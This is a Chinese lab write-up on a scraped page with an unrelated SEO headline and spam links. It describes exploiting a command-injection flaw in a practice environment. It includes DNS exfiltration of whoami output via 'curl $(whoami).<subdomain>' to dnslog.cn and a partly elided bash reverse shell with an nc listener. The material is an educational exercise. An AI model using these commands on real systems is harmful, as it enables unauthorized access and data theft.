当前位置: 首页 > news >正文

南京市建设工程交易中心网站网址seo分析

南京市建设工程交易中心网站,网址seo分析,url静态化 wordpress,大连网站建设企业任务一: 复现环境中的命令注入漏洞。 任务二: 利用命令注入执行whoami,使用DNS外带技术获取结果 任务三:使用反弹shell,将漏洞环境中的shell反弹到宿主机或者vps服务器。 任务一: 1.搭建好环境 2.先去了…

任务一:
复现环境中的命令注入漏洞。
任务二:
利用命令注入执行whoami,使用DNS外带技术获取结果
任务三:使用反弹shell,将漏洞环境中的shell反弹到宿主机或者vps服务器。

任务一:
1.搭建好环境
在这里插入图片描述
在这里插入图片描述
2.先去了解一下这个网站的功能
在这里插入图片描述
在这里插入图片描述
3.首先查看存在的metric,发现在这里是0
在这里插入图片描述
4.我们写入一个metric,首先利用burpsuite进行抓包然后用post请求添加请求体加入metric,然后我们再次查看metrics发现我们已经成功写入一个metric。
在这里插入图片描述
在这里插入图片描述
5.然后进行代码执行漏洞,在tmp下创建一个success文件,得到回显

在这里插入图片描述

在这里插入图片描述
6.然后进入容器中查看(一定要查看创建的文件路径,其他的包含任何的都不是,因为这个找了好久好久,其实很早就做出来了,还以为做错了,无语死了)。

在这里插入图片描述
任务二:
1.直接把输出的whoami重定向到1.txt文件里面(中间要用%20作为空格,不然会失败,因为这个卡了好久,看到burpsuite的颜色那里不对了)

在这里插入图片描述
2.查看1.txt文件,发现我是root。
在这里插入图片描述

3.如果是利用DNS外带技术获得结果的话
首先登入dnslog.cn,然后点击get subdomain获得专属的子域名。
在这里插入图片描述
4.然后使用curl $(whoami).子域名,然后上面回显的时候出现了(root.子域名),得到(这里有一个问题,最开始用的ping,一直没ping通,不知道为啥)
在这里插入图片描述
任务三:
1.用(bash -c “bash -i ·········“)
在这里插入图片描述
2.这里试了很久自己的反弹shell都不成功,然后试了很多次,先是把端口打开了,用ufw添加端口 ufw allow +端口,然后把自己的nc变成了 nc -lvp +端口,然后再sec一次,反弹成功了。
在这里插入图片描述

在这里插入图片描述

http://www.yidumall.com/news/46579.html

相关文章:

  • 主要b2b网站西安搜建站科技网站
  • 学校网站建设的必要性免费seo教程资源
  • 网站管理是做什么的seo搜索引擎优化方案
  • 青海网站建设哪家好做百度线上推广
  • 网页模板psd素材哈尔滨优化网站公司
  • 百度付费问答平台seo查询 站长之家
  • 暴风seo论坛网站制作优化排名
  • 深圳市住房城乡建设局网站首页济宁seo公司
  • 怎么做自己的彩票网站网络营销的八大职能
  • 网络加速器有哪些网站优化培训学校
  • 济南做网站优化的公司百度客服系统
  • 迪庆企业网站建设公司学前端去哪个培训机构
  • 郫县网站建设企业网站制作需要多少钱
  • 房产网站设计模板如何去除痘痘效果好
  • 服务器怎么建设网站前端培训班一般多少钱
  • 东莞哪里有做企业网站的搜索网页
  • 塘下网站建设seo网站有哪些
  • 太仓营销型网站建设黄页88
  • 澳门赌网站有做代理河南网站建设哪家公司好
  • 美食网站网页设计毕业论文乔拓云智能建站系统
  • 数据型网站建设网站在线客服系统 免费
  • 河南单位网站建设百度一下主页官网
  • 社交网站开发实例国内做网站的公司
  • 织梦做网站首页seo综合
  • 创业做招商加盟类网站赚钱网站seo推广招聘
  • 网站的投资和建设项目深圳网站营销seo电话
  • 上海网站建设公司大全专业北京网站建设公司
  • 伪类网站南京seo域名
  • 导航网站制作手机百度官网
  • 巴中网站建设培训班国际新闻消息